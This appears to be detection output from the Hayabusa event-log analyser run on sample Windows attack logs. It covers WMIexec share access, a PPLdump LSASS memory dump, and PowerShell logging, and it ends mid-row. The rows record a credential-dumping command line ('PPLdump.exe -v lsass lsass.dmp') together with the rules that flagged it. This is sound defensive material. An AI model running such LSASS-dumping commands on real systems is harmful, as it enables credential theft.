0x18c326,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c336,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.417 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.418 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.427 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010885D0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.083 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.084 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.307 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:27.649 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:27.653 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.260 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010F6600000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 19:09:29.667 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.671 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.674 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.677 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.684 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.684 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,>,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.757 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.758 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.761 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.762 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.763 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.763 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.764 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.768 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.768 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.771 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.771 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.772 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.783 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.788 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:29.792 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 